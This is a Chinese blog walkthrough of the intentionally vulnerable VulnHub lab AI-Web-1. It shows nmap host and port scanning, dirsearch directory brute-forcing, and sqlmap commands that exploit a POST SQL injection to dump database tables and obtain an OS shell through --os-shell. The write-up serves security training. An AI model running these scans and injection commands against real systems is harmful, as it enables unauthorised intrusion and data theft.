AI-Web-1 靶场

下载链接:https://www.vulnhub.com/entry/ai-web-1,353/

image.png
下载完成
image.png
创个文件夹放进去解压

虚拟机搭建环境

点击文件-》打开-》找到你解压的文件打开

image.png
image.png

开机

image.png
image.png
什么什么登陆创建完成

寻找靶机ip地址

一样的,环境搭好了,但是啥也没有,先找他的ip
点击你的靶场虚拟机-》右键-》设置-》网络适配器-》网络连接
(查看当前虚拟机的网络模式,这里是NAT模式)
image.png
然后点击高级-》有个MAC地址,记下来 待会儿有用
image.png
知道了该靶场网络模式为NAT模式还知道了 MAC地址
点击你VMware导航栏的编辑-》虚拟网络编辑器-》点击更改设置
image.png

选择NAT模式,下方有个该模式下自动分配的ip地址段
(靶机的网络模式也是NAT,所以靶机的ip地址,就是该网段中的一个)
image.png

开启kali 网络模式设置为NAT模式,确保kali和靶机在同一个网段可以通信
namp扫描整个网段,探测存活的主机(目的是为了找到靶机ip)

nmap 192.168.3.0/24					//扫描整个网段

image.png

扫描出来的结果不止一个,这个时候之前保存的MAC地址,就有用了,用来对比找出靶机ip
image.png

找出ip,继续扫端口,查看开放了那些服务

nmap 192.168.3.130 -p-					//全端口扫描

image.png

开放了一个80端口,本机浏览器访问看看

image.png

啥也没有,扫描目录。顺带看看robots.txt文件能不能访问
image.png
有东西,得到俩子目录,拼接访问看看
image.png
image.png

艹,******
无标题.jpg

看看目录扫描,扫出来了什么

dirsearch -u "http://192.168.3.130"

image.png

emmm,我直呼好家伙,这不是相当于还是啥也没有
等等
把刚才得到的二级目录挂上去,再梭一口

dirsearch -u "http://192.168.3.130/m3diNf0/"

image.png
有个info.php访问看看
image.png
再换个目录梭

dirsearch -u "http://192.168.3.130/se3reTdir777/uploads/"
别看了,没扫出来

退一级目录,再扫
dirsearch -u "192.168.3.130/se3reTdir777/"

然后,还真别说,扫出来了,访问
image.png

然后。。。
image.png

70c722a198e3c4ca1d509bcf626bd8f.png

啊?什么情况?
然后开始百度找教程,以及别人的复现过程。(不是,他们怎么没有这一步?经过我的不懈努力,没找到)
(还得问问大佬,去问老师。好像是虚拟机环境错了,卸载重装靶机环境)
我把靶机环境移除,在重新打开,页面出来了。。。
image.png

继续继续

提交id 获取信息 提交一个1,
image.png
更改id值为2提交,返回的内容也变了,也就是说id值被带入执行了image.png

试试提交1’,页面报错。存在SQL注入
image.png

提交的参数不在URL中,post提交方式,抓包看看
image.png

SQLmap工具梭哈

sqlmap -u "http://192.168.3.130/se3reTdir777/index.php#" -data "uid=1&Operation=Submit" --dbs

解释一下:-u 指定一个url目标 、-data 通过post方式发送数据字符串 、--dbs 列出数据库

image.png

查看aiweb1数据库下的表

sqlmap -u "http://192.168.3.130/se3reTdir777/index.php#" -data "uid=1&Operation=Submit" -D aiweb1 --tables

image.png

查看指定表下的数据

sqlmap -u "http://192.168.3.130/se3reTdir777/index.php#" -data "uid=1&Operation=Submit" -D aiweb1 -T user --dump

image.png
得到数据,但都不是靶机的登录信息
还记的之前出现的phpinfo页面吗?页面中暴露了网站的绝对路径,那我们就可以利用sqlmap拿shell

SQL注入拿shell的方式

1.unselect + into outfile
2.SQLmap(--os-shell)
3.日志写入
4.堆叠写入
等

查看网站的绝对路径

image.png

参数 --os-shell

sqlmap -u "http://192.168.3.130/se3reTdir777/index.php#" -data "uid=1&Operation=Submit" --level=3 --os-shell
level指定数据库为mysql,级别为3

可还记得这个
显示中有一个什么什么uploads,一个文件上传的目录
image.png

和我们获得的网站绝对路径拼接一下

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/			

用此绝对路径配合SQLmap,getshell

image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值